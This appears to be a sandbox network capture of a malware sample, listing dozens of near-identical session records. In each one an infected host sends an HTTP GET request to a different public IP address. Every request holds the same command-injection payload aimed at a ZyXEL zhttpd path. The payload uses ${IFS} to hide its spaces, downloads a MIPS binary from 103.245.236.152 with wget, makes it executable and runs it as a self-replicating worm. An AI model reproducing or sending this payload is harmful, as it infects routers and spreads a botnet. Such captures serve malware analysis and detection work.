                                          Jan 14, 2024 15:46:35.428308010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8930192.168.2.235539219.184.251.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.428364992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8931192.168.2.2359370197.117.74.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.428414106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8932192.168.2.235562427.231.178.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.428478956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8933192.168.2.235165891.15.225.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.428493977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8934192.168.2.2335218153.64.61.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.428570986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8935192.168.2.2350974187.199.140.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.428615093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8936192.168.2.2333046135.166.49.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.428685904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8937192.168.2.2335512130.13.246.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.428750992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8938192.168.2.236069613.181.97.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.428771019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8939192.168.2.2359570106.250.157.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.428828001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8940192.168.2.234294085.8.78.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.428911924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8941192.168.2.234360060.19.255.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.428925037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8942192.168.2.2348188165.74.6.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.428949118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8943192.168.2.2337078109.255.158.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.429020882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8944192.168.2.2338918200.80.103.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.429055929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8945192.168.2.2341966137.143.221.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.429058075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8946192.168.2.2337102129.176.156.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.429122925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8947192.168.2.235988499.167.53.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.429160118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8948192.168.2.2334770193.23.167.190443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.429229975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8949192.168.2.2348766168.29.179.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.429251909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8950192.168.2.2348978149.113.216.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.429291964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8951192.168.2.233933279.116.158.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.429315090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8952192.168.2.2338790175.162.66.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.429352045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8953192.168.2.2341330122.96.147.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.429384947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8954192.168.2.235894899.43.71.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.429419041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8955192.168.2.235881651.212.207.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.429462910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8956192.168.2.2353350208.126.164.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.429519892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8957192.168.2.235119458.121.87.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.429579973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8958192.168.2.2340736101.189.86.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.429616928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8959192.168.2.2342156200.60.203.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.429675102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8960192.168.2.2357492140.37.168.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.429709911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8961192.168.2.234427024.202.48.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.429740906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8962192.168.2.235245040.19.218.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.429809093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8963192.168.2.2345554104.250.144.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.429861069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8964192.168.2.2348458196.213.254.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.429923058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8965192.168.2.2348576176.137.9.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.429949999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8966192.168.2.2351442160.2.41.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.429974079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8967192.168.2.2345480115.205.61.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.430033922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8968192.168.2.235202459.251.129.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.430061102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8969192.168.2.2340788219.246.118.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.430121899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8970192.168.2.2357870194.55.117.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.430195093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8971192.168.2.2344900169.51.210.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.430270910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8972192.168.2.2348042202.212.173.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.430305958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8973192.168.2.233636449.244.119.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.430351973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8974192.168.2.235700054.154.14.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.430407047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8975192.168.2.2356806129.184.67.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.430450916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8976192.168.2.2345600147.252.156.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.430511951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8977192.168.2.234503478.251.195.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.430526972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8978192.168.2.2338408179.82.12.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.430548906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8979192.168.2.2357300122.27.114.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.430617094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8980192.168.2.2356574192.113.145.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.430649042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8981192.168.2.2342916221.109.80.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.430728912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8982192.168.2.2351922185.4.252.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.430762053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8983192.168.2.2360374131.250.91.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.430784941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8984192.168.2.235914269.82.156.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.430839062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8985192.168.2.2342556144.111.103.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.430876017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8986192.168.2.235885424.37.164.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.430906057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8987192.168.2.235838289.124.194.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.430962086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8988192.168.2.2352494212.182.53.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.431005955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8989192.168.2.2342998189.248.206.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.431061983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8990192.168.2.2347018196.25.62.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.431103945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8991192.168.2.2349616147.171.198.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.431140900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8992192.168.2.235060846.113.2.113443
                                          TimestampBytes transferredDirectionData
